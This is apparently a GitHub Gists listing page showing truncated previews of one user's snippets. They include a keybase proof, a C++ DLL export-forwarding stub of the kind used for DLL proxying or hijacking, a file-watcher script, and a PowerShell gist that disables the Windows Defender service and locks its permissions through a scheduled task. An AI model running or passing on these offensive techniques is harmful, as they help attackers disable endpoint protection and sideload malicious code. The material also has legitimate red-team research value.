I hereby claim:
- I am p0shkatz on github.
- I am p0shkatz (https://keybase.io/p0shkatz) on keybase.
- I have a public key ASCktdQUYuSBTup_UWSLAihx_cZEuwIgYPrIjsEdl-QuHwo
To claim this, I am signing this object:
p0shkatz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "pch.h" | |
| #include <windows.h> | |
| #include <string> | |
| #include <iostream> | |
| #pragma comment(linker, "/export:FunctionName1=C:\\\\path\\\\to\\\\legitDLL.FunctionName1") | |
| #pragma comment(linker, "/export:FunctionName2=C:\\\\path\\\\to\\\\legitDLL.FunctionName2") | |
| #pragma comment(linker, "/export:FunctionName3=C:\\\\path\\\\to\\\\legitDLL.FunctionName3") | |
| #pragma comment(linker, "/export:FunctionName4=C:\\\\path\\\\to\\\\legitDLL.FunctionName4") | |
| #pragma comment(linker, "/export:FunctionName5=C:\\\\path\\\\to\\\\legitDLL.FunctionName5") |
p0shkatz
/ disable-defender-task.ps1
Created
May 7, 2020 11:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from james forshaw | |
| # | |
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() |
p0shkatz
/ keybase.md
Created
April 2, 2019 12:42
p0shkatz
/ FileSystemWatcher.ps1
Created
February 28, 2019 00:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # FileSystemWatcher.ps1 | |
| # To stop the monitoring, run the following command: | |
| # Get-EventSubscriber | Unregister-Event | |
| # Log settings | |
| $LogFilePath = "$env:userprofile\desktop\FileSystemWatcher.log" | |
| # Execution settings | |
| $patchexec = $false | |
| # You will need to change this |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| get-process;read-host \"Press enter\"; |